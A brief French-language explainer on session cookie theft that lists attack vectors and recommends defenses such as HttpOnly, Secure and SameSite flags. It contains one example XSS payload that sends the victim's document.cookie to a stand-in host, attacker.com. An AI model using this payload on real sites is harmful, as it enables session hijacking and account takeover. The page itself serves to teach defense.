Cookie Theft — Vol de cookies de session

Session XSS combo

Vecteurs de vol

Le vol de cookie de session permet de se faire passer pour la victime sans son mot de passe. Vecteurs : XSS, MITM sur connexion non chiffrée, malware, extensions malveillantes.

<script>fetch("https://attacker.com/?c="+document.cookie)</script>

# Si HttpOnly actif, document.cookie ne montre pas ce cookie
# mais les requêtes l envoient quand même (CSRF possible)

Défenses

Cookie flags : HttpOnly + Secure + SameSite=Strict · HTTPS partout avec HSTS · Rotation régulière des tokens de session